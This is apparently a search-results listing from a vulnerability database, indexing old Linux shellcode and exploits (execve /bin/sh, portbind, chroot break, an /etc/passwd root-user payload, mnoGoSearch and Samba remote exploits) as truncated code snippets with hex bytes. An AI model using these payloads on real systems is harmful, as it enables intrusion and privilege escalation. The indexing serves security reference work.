Lucene search
+L

577 matches found

0day.today
0day.today
added 2004/09/12 12:0 a.m.33 views

linux/x86 break chroot 46 bytes

Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 46 bytes =============================== / The setuid0+chroot shellcode it will put '../' 10 times Size 46 bytes OS BSD /rootteam/dev0id www.sysworld.net email protected BITS 32 jmp short...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.28 views

linux/x86 execve /bin/sh 29 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 29 bytes ================================= / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx...

7AI score
Exploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.19 views

linux/x86 execve /bin/sh setreuid(12,12) 50 bytes

Exploit for linux/x86 platform in category shellcode ================================================= linux/x86 execve /bin/sh setreuid12,12 50 bytes ================================================= / Linux/x86 An example of setregid, execve /bin/sh I used this in practise, hence the setregid12...

7AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.33 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

No description provided by source. / Shellcode ejecuta execve /bin/sh en Irix/mips, Linux/x86, Unix/sparc by dymitr1 [email protected] / include stdio.h char code= "\x37\x37\xeb\x2f\x30\x80\x00\x12\x04\x10\xff\xff\x24\x02\x03\xf3\x23\xff\x02\x14\x23\xe4\xfe\x08"...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.33 views

linux/x86 portbind port 5074 + fork 130 bytes

linux/x86 portbind port 5074 + fork 130 bytes. Shellcode exploit for linx86 platform / [email protected] 0x9abril0x7d2 syssocketcall 102 0x66 %eax, esta es nuestra rutina principal. En todas las subrutinas vamos a necesitar a: %eax = 0x66. Luego del archivo include/linux/net.h obtenemos l...

Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.12 views

linux/x86 execve /bin/sh 24 bytes

No description provided by source. / [email protected] execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // mov...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.20 views

linux/x86 add user t00r 82 bytes

No description provided by source. / [email protected] 0x14abril0x7d2 82 bytes Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c / include stdio.h // Shellcode // Asm Code char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.24 views

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes

linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes. Shellcode exploits for multiple platform / Shellcode ejecuta execve /bin/sh en Irix/mips, Linux/x86, Unix/sparc by dymitr1 [email protected] / include char code=...

0.1AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.11 views

linux/x86 execve /bin/sh tolower() evasion 41 bytes

No description provided by source. / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include stdio.h char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" / movl %esi, %edi / "\x83\xc7\x07" / addl $0x07,...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.11 views

linux/x86 execve /bin/sh 29 bytes

No description provided by source. / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx leal 0x17%ebx,%eax int $0x80 cdq pushl $0x68732f6e pushl $0x69622f2f movl %esp, %ebx pushl %eax pushl %ebx movl %esp, %ec...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.26 views

linux/x86 unix/SPARC execve /bin/sh 80 bytes

linux/x86 unix/SPARC execve /bin/sh 80 bytes. Shellcode exploits for multiple platform / Linux/x86 and Unix/Sparc execve of /bin/sh by dymitri!!! / include char wcode= "\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"...

0.3AI score
Exploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.25 views

linux/x86 execve /bin/sh xor encrypted 55 bytes

linux/x86 execve /bin/sh xor encrypted 55 bytes. Shellcode exploit for linx86 platform / .file "xor-encrypted shellcode" .version "1.0" .text .align 4 .globl main .type main,@function start: xorl %eax,%eax jmp 0x22 popl %ebx movl 8%ebx,%edx xor %edx,%ebx xor %edx,4%ebx xor %edx,%edx movl...

0.1AI score
Exploits0
exploitpack
exploitpack
added 2004/08/09 12:0 a.m.39 views

Dropbear SSH 0.34 - Remote Code Execution

Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...

0.4AI score
Exploits0
Exploit DB
Exploit DB
added 2003/10/17 12:0 a.m.59 views

Oracle Database Server 9.0.x - Oracle Binary Local Buffer Overflow

// source: https://www.securityfocus.com/bid/8844/info Oracle Database Server 'oracle' binary has been reported prone to a local buffer overflow vulnerability. The issue likely presents itself due to a lack of sufficient boundary checks performed on command line arguments passed to the affected...

7AI score
Exploits0
0day.today
0day.today
added 2003/09/27 12:0 a.m.19 views

IBM DB2 Universal Database 7.2 (db2licm) Local Exploit

Exploit for linux platform in category local exploits ====================================================== IBM DB2 Universal Database 7.2 db2licm Local Exploit ====================================================== / Local Exploit for db2licm IBM db2 v 7.1 Linux/x86 vulnerability researched by...

6.8AI score
Exploits0
exploitpack
exploitpack
added 2003/09/18 12:0 a.m.15 views

IBM DB2 db2dart - Buffer Overflow

IBM DB2 db2dart - Buffer Overflow source: https://www.securityfocus.com/bid/8552/info It has been reported that the IBM DB2 db2dart utility is prone to locally exploitable buffer overflow vulnerability. A local attacker, who can authenticate or has access as the db2as user, may exploit this issue...

0.7AI score
Exploits0
exploitpack
exploitpack
added 2003/06/10 12:0 a.m.17 views

mnoGoSearch 3.1.20 - Remote Command Execution

mnoGoSearch 3.1.20 - Remote Command Execution !/usr/bin/perl reloaded Remote Exploit for mnoGoSearch 3.1.20 that performs remote command execution as the webserver user id for linux ix86 by pokleyzz use IO::Socket; $host = "127.0.0.1"; $cmd = "ls -la"; $searchpath = "/cgi-bin/search.cgi"; $rawret...

7.7AI score
Exploits0
Exploit DB
Exploit DB
added 2003/06/10 12:0 a.m.41 views

mnoGoSearch 3.1.20 - Remote Command Execution

!/usr/bin/perl reloaded Remote Exploit for mnoGoSearch 3.1.20 that performs remote command execution as the webserver user id for linux ix86 by pokleyzz use IO::Socket; $host = "127.0.0.1"; $cmd = "ls -la"; $searchpath = "/cgi-bin/search.cgi"; $rawret = 0xbfff105c; $ret = ""; $suffsize = 0; $port...

7.4AI score
Exploits0
exploitpack
exploitpack
added 2003/04/07 12:0 a.m.18 views

Samba 2.2.x - nttrans Remote Overflow (Metasploit)

Samba 2.2.x - nttrans Remote Overflow Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

0.8AI score0.87923EPSS
Exploits6
seebug.org
seebug.org
added 2003/04/07 12:0 a.m.34 views

Samba 2.2.x nttrans Overflow

No description provided by source. $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require...

7.1AI score0.87923EPSS
Exploits6
Rows per page
Query Builder